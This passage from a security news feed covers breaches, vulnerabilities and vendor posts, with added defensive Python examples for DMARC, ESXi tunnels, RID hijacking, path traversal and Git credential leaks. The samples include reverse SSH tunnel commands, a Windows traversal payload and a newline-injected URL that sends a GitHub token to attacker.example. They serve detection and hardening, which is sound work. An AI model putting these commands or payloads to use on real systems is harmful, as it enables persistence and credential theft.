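        a.errors.append("pct must be an integer 0-100")
        a.valid = False
    elif int(pct) < 100 and policy != "none":
        a.warnings.append(f"pct={pct}: policy enforced on only {pct}% of failing mail")
    sp = a.tags.get("sp")
    if sp is not None and sp not in POLICIES:
        a.errors.append("sp= must be none/quarantine/reject")
        a.valid = False
    elif sp == "none" and policy != "none":
        a.warnings.append("sp=none: subdomains can still be spoofed")
    rua = a.tags.get("rua")
    if rua is None:
        a.warnings.append("no rua=: you will receive no aggregate reports")
    else:
        bad = [u.strip() for u in rua.split(",") if not MAILTO.match(u.strip())]
        if bad:
            a.errors.append(f"rua has non-mailto URI(s): {bad}")
            a.valid = False
    for t in ("adkim", "aspf"):
        if a.tags.get(t, "r") not in ALIGNMENT:
            a.errors.append(f"{t}= must be r (relaxed) or s (strict)")
            a.valid = False
    return a


def assess_all(records=SAMPLE_RECORDS):
    """Assess every record in a {name: txt} map; returns {name: Assessment}."""
    return {name: assess(rec) for name, rec in records.items()}


if __name__ == "__main__":
    for name, result in assess_all().items():
        print(name, "valid" if result.valid else "INVALID", result.errors, result.warnings)
```

To run it against a real domain, fetch the TXT record for `_dmarc.<domain>` with your resolver of choice and pass the string to `assess()`; the point of keeping the parser separate from the lookup is that the checker stays testable offline.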

The post DMARC Email Security: A Guide to Protecting Your Domain appeared first on Security Boulevard.

Read More
Gravy Analytics Breach, Subaru Starlink Vulnerability Exposed

In this episode, we discuss the latest issues with data brokers, focusing on a breach at Gravy Analytics that leaked 30 million location data points online. We also explore a vulnerability in Subaru’s Starlink system that allows unrestricted access to vehicle controls and customer data using just a last name and license plate number. Co-host […]

The post Gravy Analytics Breach, Subaru Starlink Vulnerability Exposed appeared first on Shared Security Podcast.

The post Gravy Analytics Breach, Subaru Starlink Vulnerability Exposed appeared first on Security Boulevard.

Read More
Innovative Approaches to Secrets Scanning

Is Traditional Cybersecurity Enough in the Age of Automation? Imagine this. You’re in charge of your company’s cybersecurity, and you’ve invested in the best protection money can buy. But a data breach happens, and you’re left wondering where things went wrong. Could the intrusion have been prevented? Is there a better way to safeguard your […]

The post Innovative Approaches to Secrets Scanning appeared first on Entro.

The post Innovative Approaches to Secrets Scanning appeared first on Security Boulevard.

Empowering Cloud Compliance with Seamless Security

Why are Non-Human Identities (NHIs) Crucial for Seamless Security? Can you imagine a smooth security system that leaves no stone unturned? Non-human identities (NHIs) and secrets management play a significant role in creating an empowered security strategy, particularly in the cloud environment. NHIs, defined as machine identities in cybersecurity, are the linchpins that control access […]

The post Empowering Cloud Compliance with Seamless Security appeared first on Entro.

The post Empowering Cloud Compliance with Seamless Security appeared first on Security Boulevard.

Scaling Security with Automated Identity Management

How Crucial is Automated Identity Management in Scaling Security? There’s an ever-increasing need for advanced cybersecurity measures. Organizations, especially those operating in the cloud, can no longer afford to ignore automated identity management as a key part of these precautions. But what does that really entail? And why is it so essential to scaling security? […]

The post Scaling Security with Automated Identity Management appeared first on Entro.

The post Scaling Security with Automated Identity Management appeared first on Security Boulevard.

Clone2Leak attacks exploit Git flaws to steal credentials

A set of three distinct but related attacks, dubbed 'Clone2Leak,' can leak credentials by exploiting how Git and its credential helpers handle authentication requests. [...]

UnitedHealth now says 190 million impacted by 2024 data breach

UnitedHealth has revealed that 190 million Americans had their personal and healthcare data stolen in the Change Healthcare ransomware attack, nearly doubling the previously disclosed figure. [...]

Ransomware gang uses SSH tunnels for stealthy VMware ESXi access

Ransomware actors targeting ESXi bare metal hypervisors are leveraging SSH tunneling to persist on the system while remaining undetected. [...]
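The practitioner's check for the technique above is the hypervisor's own shell history. The following is an added example, not code from the article or from any vendor tooling: it scans ESXi's /var/log/shell.log for ssh invocations that request port forwarding. The line layout ("timestamp shell[pid]: [user]: command") is assumed for the example and every log line is constructed.

```python
"""Flag SSH tunnel setup in ESXi shell history.

Added example; not from the article and not vendor tooling. ESXi records
interactive shell commands in /var/log/shell.log. The line layout used here
("timestamp shell[pid]: [user]: command") is assumed, and every log line below
is constructed. The detector flags ssh invocations that ask for port forwarding
(-R reverse, -L local, -D dynamic, -w tun device), which is what a persistence
tunnel out of a hypervisor looks like, and records -N/-f (no remote command,
run in background) as supporting context.
"""
import re
import shlex

# Constructed shell.log excerpt: two tunnel commands among routine admin activity.
SHELL_LOG = """\
2025-01-27T08:12:03Z shell[2106891]: [root]: esxcli network firewall ruleset list
2025-01-27T08:13:40Z shell[2106891]: [root]: ssh -fN -R 2222:127.0.0.1:22 svc@203.0.113.10
2025-01-27T08:14:02Z shell[2106891]: [root]: ssh -o StrictHostKeyChecking=no -D 1080 -N ops@203.0.113.10
2025-01-27T08:15:11Z shell[2106891]: [root]: ssh admin@10.0.0.5 uptime
2025-01-27T08:16:00Z shell[2106891]: [root]: vim-cmd vmsvc/getallvms
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) shell\[(?P<pid>\d+)\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$")
TUNNEL_FLAGS = {"-R", "-L", "-D", "-w"}
BACKGROUND_FLAGS = {"-N", "-f"}


def ssh_flags(cmd: str) -> set[str]:
    """Return the single-letter ssh options in a shell command, expanding bundles like -fN."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return set()
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return set()
    found: set[str] = set()
    for arg in argv[1:]:
        if arg.startswith("-") and not arg.startswith("--") and len(arg) > 1:
            found |= {"-" + c for c in arg[1:]}
    return found


def find_tunnels(log: str) -> list[dict]:
    """Parse shell.log lines and return the ssh commands that set up port forwarding."""
    hits = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        flags = ssh_flags(m["cmd"])
        if flags & TUNNEL_FLAGS:
            hits.append({
                "ts": m["ts"],
                "user": m["user"],
                "forwarding": sorted(flags & TUNNEL_FLAGS),
                "background": sorted(flags & BACKGROUND_FLAGS),
                "cmd": m["cmd"],
            })
    return hits


if __name__ == "__main__":
    for hit in find_tunnels(SHELL_LOG):
        print(hit["ts"], hit["user"], hit["forwarding"], hit["background"], hit["cmd"])
```

The bundled-flag expansion is a heuristic (an option value that happens to start with a dash would be expanded too), so treat hits as leads to confirm against the SSH daemon's own auth log and the host's outbound connections rather than as verdicts. Forward shell.log to a collector as well; an attacker with root on the host can truncate it locally.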

TalkTalk investigates breach after data for sale on hacking forum

UK telecommunications company TalkTalk is investigating a third-party supplier data breach after a threat actor began selling alleged customer data on a hacking forum. [...]

PayPal to pay $2 million settlement over 2022 data breach

New York State has announced a $2,000,000 settlement with PayPal over charges it failed to comply with the state's cybersecurity regulations, leading to a 2022 data breach. [...]

Zyxel warns of bad signature update causing firewall boot loops

Zyxel is warning that a bad security signature update is causing critical errors for USG FLEX or ATP Series firewalls, including putting the device into a boot loop. [...]

Microsoft to deprecate WSUS driver synchronization in 90 days

Microsoft has reminded Windows administrators that driver synchronization in Windows Server Update Services (WSUS) will be deprecated on April 18, 90 days from now. [...]

Subaru Starlink flaw let hackers hijack cars in US and Canada

Security researchers have discovered an arbitrary account takeover flaw in Subaru's Starlink service that could let attackers track, control, and hijack vehicles in the United States, Canada, and Japan using just a license plate. [...]

Hackers use Windows RID hijacking to create hidden admin account

A North Korean threat group has been using a technique called RID hijacking that tricks Windows into treating a low-privileged account as one with administrator permissions. [...]
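RID hijacking leaves a detectable inconsistency in the SAM hive, and the following added example (not from the article, and not the group's tooling) shows the check. Under HKLM\SAM\SAM\Domains\Account\Users each local account has a subkey named with its RID in hex, and that key's binary F value stores the same RID as a little-endian DWORD at offset 0x30; that layout comes from public SAM documentation and is assumed here. The F blobs in the example are constructed.

```python
"""Detect RID hijacking by cross-checking SAM user keys against their F values.

Added example; not from the article and not the threat group's tooling. Under
HKLM\\SAM\\SAM\\Domains\\Account\\Users each local account has a subkey named
with its RID in uppercase hex (000003E9 is RID 1001) and a binary F value that
stores the same RID as a little-endian DWORD at offset 0x30. That layout is
taken from public SAM documentation and is assumed here. RID hijacking
overwrites those four bytes with 0x1F4 (500, the built-in Administrator), so a
low-privileged account is authorised as Administrator at logon while still
listing as an ordinary user. The F blobs below are constructed.
"""
import struct

RID_OFFSET = 0x30
ADMIN_RID = 500


def rid_from_f(f_value: bytes) -> int:
    """Read the RID stored inside a user's F value."""
    if len(f_value) < RID_OFFSET + 4:
        raise ValueError("F value too short to contain a RID")
    return struct.unpack_from("<I", f_value, RID_OFFSET)[0]


def rid_from_key_name(name: str) -> int:
    """The registry subkey name is the RID in hex."""
    return int(name, 16)


def find_hijacked(users: dict[str, bytes]) -> list[dict]:
    """Return every account whose stored RID disagrees with its key name."""
    findings = []
    for key_name, f_value in users.items():
        expected = rid_from_key_name(key_name)
        stored = rid_from_f(f_value)
        if expected != stored:
            findings.append({
                "key": key_name,
                "expected_rid": expected,
                "stored_rid": stored,
                "impersonates_admin": stored == ADMIN_RID,
            })
    return findings


def make_f(rid: int, length: int = 0x50) -> bytes:
    """Build a constructed F blob with only the RID field populated."""
    buf = bytearray(length)
    struct.pack_into("<I", buf, RID_OFFSET, rid)
    return bytes(buf)


# Constructed hive content: subkey name -> F value.
SAMPLE_USERS = {
    "000001F4": make_f(500),   # Administrator, consistent
    "000001F5": make_f(501),   # Guest, consistent
    "000003E9": make_f(500),   # RID 1001 account whose F value now claims RID 500
    "000003EA": make_f(1002),  # ordinary account, consistent
}


if __name__ == "__main__":
    for finding in find_hijacked(SAMPLE_USERS):
        print(finding)
```

On a live host the SAM key is readable only as SYSTEM, so in practice you export the hive (reg save HKLM\SAM, or a copy from a forensic image), read each Users subkey's F value with a hive parser, and feed the name/value pairs to find_hijacked. A non-empty result is the finding; the same comparison is worth scheduling as a periodic integrity check on hosts where local accounts matter.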

Hacker infects 18,000 "script kiddies" with fake malware builder

A threat actor targeted low-skilled hackers, known as "script kiddies," with a fake malware builder that secretly infected them with a backdoor to steal data and take over computers. [...]

Microsoft: Outdated Exchange servers fail to auto-mitigate security bugs

Microsoft says outdated Exchange servers cannot receive new emergency mitigation definitions because an Office Configuration Service certificate type is being deprecated. [...]

Managed Detection and Response – How are you monitoring?

Security Information and Event Management (SIEM) systems are now a critical component of enterprise security. Learn more from Smarttech247 about how its VisionX + Splunk solution can help secure your organization. [...]

Hackers get $886,250 for 49 zero-days at Pwn2Own Automotive 2025

The Pwn2Own Automotive 2025 hacking contest has ended with security researchers collecting $886,250 after exploiting 49 zero-days. [...]

TalkTalk investigating data breach after hacker claims theft of customer data

A hacker claims to be selling the data of 18.8 million TalkTalk customers, but the telecoms giant says this figure is ‘significantly overstated’

© 2024 TechCrunch. All rights reserved. For personal use only.

US indicts five individuals in crackdown on North Korea’s illicit IT workforce

The multi-year scheme saw the defendants generate hundreds of thousands in revenue.

OpenAI says it may store deleted Operator data for up to 90 days

OpenAI says that it might store chats and associated screenshots from customers who use Operator, the company’s AI “agent” tool, for up to 90 days — even after a user manually deletes them. OpenAI has a similar deleted data retention policy for ChatGPT, its AI-powered chatbot platform. However, the retention period for ChatGPT is only […]

Passbolt raises $8M for its open source password manager for teams

Password managers have become commonplace at this point. But businesses often have different needs than consumers. Teams, after all, often have to share credentials to access resources, all while IT and security teams need ways to control who has access to them. Passbolt, which is announcing an $8 million seed round Thursday, aims to become […]

Conduent confirms outage was due to a cybersecurity incident

U.S. government contractor Conduent, which provides technology to support services such as child support and food assistance, has confirmed that a recent outage was caused by a cybersecurity incident.  Conduent confirmed the disruption, which left some U.S. residents without access to support payments, to TechCrunch on Tuesday but declined to say whether the outage was […]

What PowerSchool isn’t saying about its ‘massive’ student data breach

The hack has the potential to be one of the biggest of the year, but the edtech giant is refusing to answer important questions

Toronto school district says 40 years of student data stolen in PowerSchool breach

Canada’s largest school board says hackers may have accessed some 40 years’ worth of student data during the recent PowerSchool breach.  In a letter sent to parents this week, the Toronto District School Board (TDSB) said that the data breach affected all students enrolled in the district between September 1985 and December 2024.  The school […]

HPE investigating security breach after hacker claims theft of sensitive data

A well-known hacker claims to have stolen source code and user data from the enterprise IT giant

Treasury sanctions Salt Typhoon hacking group behind breaches of major US telecom firms

The US government has also sanctioned the hacker responsible for December's US Treasury hack

Clop ransomware gang names dozens of victims hit by Cleo mass-hack, but several firms dispute breaches

The Russia-linked ransomware group is threatening to leak data stolen from almost 60 Cleo Software customers if ransoms aren't paid

PowerSchool data breach victims say hackers stole ‘all’ historical student and teacher data

A trove of information on current and former students and teachers was accessed during the December cyberattack, sources say

UK plans to ban public sector organizations from paying ransomware hackers

The Home Office has proposed a 'targeted ban' on ransom payments following a wave of cyberattacks targeting the UK

UK domain giant Nominet confirms cybersecurity incident linked to Ivanti VPN hacks

Nominet, the U.K. domain registry that maintains .co.uk domains, has experienced a cybersecurity incident that it confirmed is linked to the recent exploitation of a new Ivanti VPN vulnerability. In an email to customers, seen by TechCrunch, Nominet warned of an “ongoing security incident” under investigation. Nominet said hackers accessed its systems via “third-party VPN […]

Microsoft accuses group of developing tool to abuse its AI service in new lawsuit

Microsoft has taken legal action against a group the company claims intentionally developed and used tools to bypass the safety guardrails of its cloud AI products. According to a complaint filed by the company in December in the U.S. District Court for the Eastern District of Virginia, a group of 10 unnamed defendants allegedly used […]

A drone punched a hole into an LA firefighting plane

A drone collided with a 'Super Scooper' firefighting plane.

Cannabis company Stiiizy says hackers accessed customers’ ID documents

A ransomware gang took credit for the breach, claiming to have stolen over 400,000 government-issued identity documents from customers.

DoorBox debuts its new and improved smart delivery box at CES 2025

Millions of packages are stolen each year. DoorBox aims to change how packages are delivered with its smart package box that features a theft-proof design with live camera feeds and an alarm that activates automatically if the box is tampered with.  After selling 2,000 units of its initial version, which offered manual functionality, the startup […]

PowerSchool says hackers stole students’ sensitive data, including Social Security numbers, in data breach

In an FAQ obtained by TechCrunch, PowerSchool confirms it negotiated with the threat actors responsible for the breach.

Hackers are exploiting a new Ivanti VPN security bug to hack into company networks

Mandiant says a Chinese cyberespionage group has been exploiting the critical-rated vulnerability since at least mid-December.

The US has a new cybersecurity safety label for smart devices

The White House this week announced a new label for internet-connected devices, the U.S. Cyber Trust Mark, intended to help consumers make more-informed decisions about the cybersecurity of products they bring into their homes. To earn the U.S. Cyber Trust Mark, which is being administered by the Federal Communications Commission, companies have to test their […]

KoDDos Will be at CyberShow 2025 in Paris!

The post KoDDos Will be at CyberShow 2025 in Paris! appeared first on KoDDoS Blog.

Technological innovation in the heart of Los Angeles at the CES 2025 🚀

🚀 Cutting-Edge Services: KoDDoS has established itself as a key player in the field of high-performance hosting. Specializing in anti-DDoS protection, we ensure unmatched service continuity for our clients in the face of growing threats targeting digital infrastructures. We also invest in groundbreaking technologies, including Web3, blockchain, and the Internet of Things (IoT), providing tailored …

The post Technological innovation in the heart of Los Angeles at the CES 2025 🚀 appeared first on KoDDoS Blog.

Recruitment Announcement: B2B Sales Representatives and Business Introducers

To meet growing demand and accelerate our growth, we are launching a new sales team. We are looking for talented, ambitious, and motivated B2B sales representatives and business introducers who share our vision of a safer and more resilient internet. Job Profile: Position: B2B Sales Representatives and Business Introducers. As a key member of our Sales Team, you will …

The post Recruitment Announcement: B2B Sales Representatives and Business Introducers appeared first on KoDDoS Blog.

⏳ Only 3 Days Left to Grab 10% Off on All KoDDoS Services! 🎃

The countdown has begun! There are only 3 days left to take advantage of our Halloween special and enjoy 10% off on all our hosting and DDoS protection services. Don’t miss this limited-time offer to secure your website with KoDDoS’s high-performance solutions at a great price! 🎃 Promo Code: HALLOWEEN2024 🎃 Use code HALLOWEEN2024 at …

The post ⏳ Only 3 Days Left to Grab 10% Off on All KoDDoS Services! 🎃 appeared first on KoDDoS Blog.

Understanding and Preventing DDoS Attacks with KoDDoS

Distributed Denial of Service (DDoS) attacks represent one of the most formidable threats to modern businesses and organizations whose information systems are connected to the internet. These attacks aim to render a service unavailable by overwhelming the target server’s resources with a massive volume of malicious traffic from multiple sources. In the face of this …

The post Understanding and Preventing DDoS Attacks with KoDDoS appeared first on KoDDoS Blog.

Special Halloween Offer: 10% Off All Hosting and DDoS Protection Services! 🎃

Halloween is just around the corner, and at KoDDoS, we’re celebrating this spooky season with an exclusive offer that will make you smile! To mark the occasion, we’re giving you 10% off all our hosting and DDoS protection services. Whether you’re launching a new project or looking to enhance the security of your existing site, …

The post Special Halloween Offer: 10% Off All Hosting and DDoS Protection Services! 🎃 appeared first on KoDDoS Blog.

Celebrate Halloween with an Exclusive 10% Discount from KoDDoS! 🎃

🎃 Exclusive Halloween Promo – 10% Off on All Services. From October 18, 2024, to October 31, 2024, enjoy our limited-time Halloween offer with the promo code: 👉 HALLOWEEN2024 👈 Simply apply this code at checkout to receive your discount. Whether you’re a small business owner, a content creator, or managing a large e-commerce platform, …

The post Celebrate Halloween with an Exclusive 10% Discount from KoDDoS! 🎃 appeared first on KoDDoS Blog.

Discover the Benefits of KoDDoS and Its New Infrastructures in Japan and Sweden

Secure Hosting to Support Your Business: KoDDoS, your expert in secure hosting and DDoS protection, continues to innovate by providing its customers with the best hosting solutions worldwide. We are proud to announce the deployment of new ultra-efficient infrastructures in Japan and Sweden. With this strategic expansion, KoDDoS not only strengthens its global reach but …

The post Discover the Benefits of KoDDoS and Its New Infrastructures in Japan and Sweden appeared first on KoDDoS Blog.

The Return of the Internet Archive After a Cyberattack: The Challenge of Cybersecurity

The Internet Archive, renowned for its vast digital library and its web preservation tool, the Wayback Machine, recently fell victim to a major cyberattack that disrupted its services. On October 9, a combined attack involving a data breach and a distributed denial-of-service (DDoS) attack took the site offline. This incident also led to the theft …

The post The Return of the Internet Archive After a Cyberattack: The Challenge of Cybersecurity appeared first on KoDDoS Blog.

Interview with Luc M. aka “Moussier Network” Senior Consultant and Founder at “Just Do DDoS”: Protecting Businesses Against DDoS

What is a DDoS consultant? Luc M.: A DDoS consultant is an expert specializing in securing digital infrastructures against Distributed Denial of Service (DDoS) attacks. As a DDoS consultant, our mission is among other things to support our clients and partners in implementing effective protection measures to prevent these increasingly frequent and sophisticated threats. at …

The post Interview with Luc M. aka “Moussier Network” Senior Consultant and Founder at “Just Do DDoS”: Protecting Businesses Against DDoS appeared first on KoDDoS Blog.

Best Practices for Securing Your SaaS Environment

Can you imagine a modern working world without Software-as-a-Service (SaaS) applications? Productivity, communication, and project management solutions have transformed the modern workplace, enabling hybrid and remote working, helping to cut costs, and offering unprecedented opportunities for collaboration and innovation. Without them, the business world would grind to a halt. But these applications, like anything connected to the internet, are vulnerable to cyber threats. Part of the problem is that SaaS providers are responsible for securing SaaS infrastructure, platforms, and application...

Industry Optimism Grows as TSA Proposes Balanced Cybersecurity Measures

The Transportation Security Administration (TSA) has proposed new rules requiring those under its jurisdiction to follow specific cyber risk management (CRM) requirements, report cybersecurity incidents in a certain timeframe, and address physical security concerns. This is positive news for the transportation industry, as hundreds of attacks have been leveled against the sector. These attacks have the potential to impact the supply chain, create chaos, and endanger human lives. TSA's notice of proposed rulemaking (NPRM) "continues TSA's commitment to performance-based requirements and builds...

New Law Could Mean Prison for Reporting Data Leaks

The Turkish government is proposing a controversial new cybersecurity law that could make it a criminal act to report on data breaches. The new legislation proposes penalties for various cybersecurity-related offences. But they key one which has people concerned is this: "Those who carry out activities aimed at targeting institutions or individuals by creating the perception that there has been a data breach in cyberspace, even though there has been no data breach, shall be sentenced to imprisonment for a term of two to five years." The problem is, of course, that such a law may discourage the...

From Alerts to Action: How AI Empowers SOC Analysts to Make Better Decisions

Security Operations Center (SOC) analysts have it rough. Modern security tools generate an extraordinary number of alerts, attackers are more sophisticated than ever, and IT infrastructures are unprecedentedly complex. As a result, analysts are overwhelmed with workload and alerts, making it near-impossible to make intelligent, informed decisions. Fortunately, artificial intelligence (AI) is helping to ease the strain. Let’s look at how. Better Allocated Resources As noted, modern SOC analysts must deal with a barrage of security alerts. Not only do modern organizations suffer a vast number...

CIS Control 05: Account Management

Knowing who has credentials, how those credentials are granted, and how they are being used is the foundation of any secure environment. It begins with user accounts and the credentials they use. Maintaining a thorough inventory of all accounts and verifying any changes to those accounts as authorized and intentional vs unintended is paramount to establishing a secure environment, and this includes service accounts. Establishing and maintaining visibility on all accounts can protect assets in multiple ways. If an adversary is able to attack from a different vector that we do not have any...

Understanding Microsoft's CVSS v3.1 Ratings and Severity Scores

Recently, I looked at Microsoft’s assigned CVSS v3.1 scores for Patch Tuesday vulnerabilities alongside the Microsoft assigned severity ratings. I wanted to revisit these numbers and see just how closely CVSS aligns with Microsoft’s opinion of severity. Disclaimer: I’m aware that CVSS v4.0 exists. However, Microsoft has not yet adopted it, and I wanted an apples-to-apples comparison. What Is CVSS v3.1? CVSS v3.1 provides the Qualitative Severity Rating Scale, which maps scores to ratings as follows: None 0.0; Low 0.1–3.9; Medium 4.0–6.9; High 7.0–8.9; Critical 9.0–10.0 (source: FIRST.org)...

Medusa Ransomware: What You Need To Know

What is the Medusa ransomware? Medusa is a ransomware-as-a-service (RaaS) platform that first came to prominence in 2023. The ransomware impacts organisations running Windows, predominantly exploiting vulnerable and unpatched systems and hijacking accounts through initial access brokers. Initial access brokers? Initial access brokers (IABs) specialise in gaining unauthorised access to the networks of organisations, and then sell that access to other cybercriminals - such as ransomware gangs like Medusa. So the ransomware attackers may not be the ones who initially hacked you? Correct. IABs may...

NASA's Cybersecurity Initiative: What Spacecraft Manufacturers Need to Know

NASA is about to introduce new requirements for its contractors. These requirements will dramatically improve the cybersecurity of spacecraft and the US’ resilience to cyber threats. But what do these requirements mean for spacecraft manufacturers? What challenges will they face? And what will they need to do to comply? Keep reading to find out. Understanding the Cyber Space Threat While NASA has cybersecurity requirements for its spacecraft in operation, these requirements do not extend to the spacecraft acquisition and development lifecycle. Essentially, NASA contractors are not currently...

Helping the Energy Sector Navigate NERC Complexities

The energy sector is the cornerstone of modern infrastructure, powering essential services and supporting the daily operations of economies worldwide. However, it also faces unique cybersecurity challenges, particularly in complying with the North American Electric Reliability Corporation's Critical Infrastructure Protection (NERC CIP) standards. Cyber threats keep growing in sophistication and frequency and the sector's critical assets—such as power grids, pipelines, and renewable energy networks—face unprecedented risk. The implications of a cyberattack on these systems extend far beyond...

Managing Security and Compliance in a Remote Work Environment

Remote work isn’t just a temporary trend anymore; it has become a permanent fixture. What began as a quick response during the pandemic has evolved into the new normal for businesses worldwide. In America, 20% of people now work from home. While this has its advantages (flexibility for workers and cost savings for businesses), it’s not without its complications, having cracked open a host of issues around cybersecurity and regulatory compliance. To address these challenges, businesses can’t afford to be lax. That means fixing security and compliance for remote work is not as simple as adding...

White House Considers Oracle-Led Takeover of TikTok with U.S. Investors

In a significant development, the Trump administration is reportedly formulating a plan to prevent a nationwide ban on TikTok, involving Oracle and a consortium of private investors. Under the proposed arrangement, ByteDance, TikTok’s Chinese parent company, would retain a minority stake, while Oracle would oversee critical operations, including algorithm management, data collection, and software updates. […]

The post White House Considers Oracle-Led Takeover of TikTok with U.S. Investors appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Critical Vulnerability in IBM Security Directory Enables Session Cookie Theft

IBM has announced the resolution of several security vulnerabilities affecting its IBM Security Directory Integrator and IBM Security Verify Directory Integrator products. The vulnerabilities, identified through the Common Vulnerabilities and Exposures (CVE) system, expose users to various risks, including sensitive data disclosure and potential cookie theft. The company urges customers to update to the latest […]

The post Critical Vulnerability in IBM Security Directory Enables Session Cookie Theft appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Critical Apache Solr Vulnerability Grants Write Access to Attackers on Windows

A new security vulnerability has been uncovered in Apache Solr, affecting versions 6.6 through 9.7.0. The issue, classified as a Relative Path Traversal vulnerability, exposes Solr instances running on Windows to potential risks of arbitrary file path manipulation and write-access. Tracked as SOLR-17543, this vulnerability could permit attackers to exploit the “configset upload” API through […]
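The bug class named above, relative path traversal that only bites on Windows, is easy to reproduce without Solr. The following is an added example, not Solr's code and not a reproduction of the reported issue: a service takes a file name from an uploaded archive (the entry name is the attacker-controlled input) and writes it under a base directory. It uses Python's ntpath so Windows semantics (backslash separators, drive letters, UNC names) are reproduced on any host. The base directory and entry names are constructed.

```python
"""Relative path traversal on Windows: an unconfined write beside a confined one.

Added example; not Solr's code and not a reproduction of the reported bug. It
models the bug class: a service takes a file name from an uploaded archive
(the entry name is the attacker-controlled input) and writes it under a base
directory. ntpath is used so Windows semantics (backslash separators, drive
letters, UNC names) are reproduced on any host. The base directory and the
entry names are constructed.
"""
import ntpath

BASE = r"C:\solr\server\solr\configsets\mine"   # constructed


def naive_join(base: str, name: str) -> str:
    """Weak check: only the forward-slash spelling of '..' is rejected."""
    if "../" in name:
        raise ValueError("rejected")
    return base + "\\" + name


def resolved_naive(base: str, name: str) -> str:
    """Where the naive join actually lands once Windows normalises it."""
    return ntpath.normpath(naive_join(base, name))


def confined_join(base: str, name: str) -> str:
    """Hardened: resolve first, then require the result to stay strictly inside base."""
    base_abs = ntpath.normpath(ntpath.abspath(base))
    # Absolute paths, drive-qualified names and UNC paths are never valid entry names.
    if ntpath.isabs(name) or ntpath.splitdrive(name)[0]:
        raise ValueError("absolute or drive-qualified name rejected")
    target = ntpath.normpath(ntpath.join(base_abs, name))
    # commonpath defeats both '..' escapes and sibling-prefix tricks (mine vs mine2).
    if target == base_abs or ntpath.commonpath([base_abs, target]) != base_abs:
        raise ValueError("path escapes base directory")
    return target


def escapes(name: str) -> bool:
    """True if the confined join refuses the entry name."""
    try:
        confined_join(BASE, name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    traversal = "..\\..\\..\\..\\..\\Windows\\Tasks\\evil.job"
    print("naive resolves to:", resolved_naive(BASE, traversal))
    print("confined rejects:", escapes(traversal))
```

A check written and tested on Linux, where backslash is an ordinary filename character, passes "..\\..\\x" straight through and only fails on the Windows deployment; the confined version normalises before comparing, which is the only ordering that works. On the real filesystem, follow the same resolution with a check that the target's parent is not a symlink or junction pointing outside the base.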

The post Critical Apache Solr Vulnerability Grants Write Access to Attackers on Windows appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

GitHub Vulnerability Exposes User Credentials via Malicious Repositories

A cybersecurity researcher recently disclosed several critical vulnerabilities affecting Git-related projects, revealing how improper handling of credential protocols can lead to sensitive data leaks. From GitHub Desktop to Git Credential Manager and Git LFS, these issues were uncovered during a routine bug-hunting session for the GitHub Bug Bounty program, resulting in the assignment of multiple […]
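Both this item and the Clone2Leak item above come down to the same thing: Git's credential protocol is line-oriented ("key=value" lines ended by a blank line), so a value that is not validated for control characters can be turned into extra lines. The following is an added example that models that class; it is not Git's code, not any helper's code and not the researcher's proof of concept. It has a helper that keeps one stored credential per host, a naive request writer that copies the host out of the remote URL unchecked, and a hardened writer that refuses control characters. The URLs, hosts and token are constructed, and the minimal URL split is deliberate so that the newline survives into the host field.

```python
"""Git credential protocol: how a control character in a remote URL can redirect a stored secret.

Added example; not Git's code, not a helper's code and not the researcher's
proof of concept. Git hands credential helpers a request made of "key=value"
lines ended by a blank line, and the helper answers in the same format. The
model below has a helper that keeps one stored credential per host, a naive
request writer that copies the host out of the remote URL unchecked, and a
hardened writer that refuses control characters. The remote URLs, hosts and
token are constructed; the minimal URL split is deliberate so that the
newline survives into the host field.
"""
from typing import Callable, Optional

STORE = {"github.com": ("alice", "ghp_constructed_token")}  # constructed helper storage


def fields_from_url(url: str) -> dict[str, str]:
    """Minimal 'scheme://host/path' split, standing in for the remote-URL parser."""
    scheme, _, rest = url.partition("://")
    host = rest.split("/", 1)[0]
    return {"protocol": scheme, "host": host}


def serialize_naive(fields: dict[str, str]) -> str:
    """Write the request exactly as given: a newline inside a value becomes a new line."""
    return "".join(f"{k}={v}\n" for k, v in fields.items()) + "\n"


def serialize_hardened(fields: dict[str, str]) -> str:
    """Refuse any value that could terminate a line or the whole request early."""
    for k, v in fields.items():
        if any(ch in v for ch in "\r\n\0"):
            raise ValueError(f"control character in credential field {k!r}")
    return serialize_naive(fields)


def helper_fill(request: str) -> dict[str, str]:
    """Helper side: parse key=value lines up to the blank line; a repeated key overwrites (lenient, assumed)."""
    req: dict[str, str] = {}
    for line in request.split("\n"):
        if line == "":
            break
        key, _, value = line.partition("=")
        req[key] = value
    reply = dict(req)
    if req.get("host") in STORE:
        reply["username"], reply["password"] = STORE[req["host"]]
    return reply


def credential_sent(url: str, serializer: Callable[[dict[str, str]], str]) -> Optional[tuple[str, str]]:
    """What Git would attach to its connection to `url` after asking the helper."""
    reply = helper_fill(serializer(fields_from_url(url)))
    if "password" in reply:
        return reply["username"], reply["password"]
    return None


def hardened_rejects(url: str) -> bool:
    """True if the hardened writer refuses to build a request for this URL at all."""
    try:
        serialize_hardened(fields_from_url(url))
    except ValueError:
        return True
    return False


# Constructed: the host component carries a newline followed by a second host line.
MALICIOUS_URL = "https://attacker.example\nhost=github.com/repo.git"
HONEST_URL = "https://attacker.example/repo.git"


if __name__ == "__main__":
    print("naive writer sends:", credential_sent(MALICIOUS_URL, serialize_naive))
    print("hardened writer rejects:", hardened_rejects(MALICIOUS_URL))
```

With the naive writer the helper sees "host=github.com" as the last host line and returns the GitHub token, which Git would then present to attacker.example, the host it actually connects to. The fix belongs on both sides: the client must reject carriage returns, newlines and NUL in every URL component before serialising, and a helper should treat a malformed or repeated field as fatal rather than taking the last value.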

The post GitHub Vulnerability Exposes User Credentials via Malicious Repositories appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Critical Isolation Vulnerability in Intel Trust Domain Extensions Exposes Sensitive Data

Researchers from IIT Kharagpur and Intel Corporation have identified a significant security vulnerability in Intel Trust Domain Extensions (TDX), a foundational technology designed to ensure robust isolation between virtual machines (VMs) in secure environments. The study reveals that hardware performance counters (HPCs), meant for performance monitoring, can be exploited by Virtual Machine Managers (VMMs) to […]

The post Critical Isolation Vulnerability in Intel Trust Domain Extensions Exposes Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

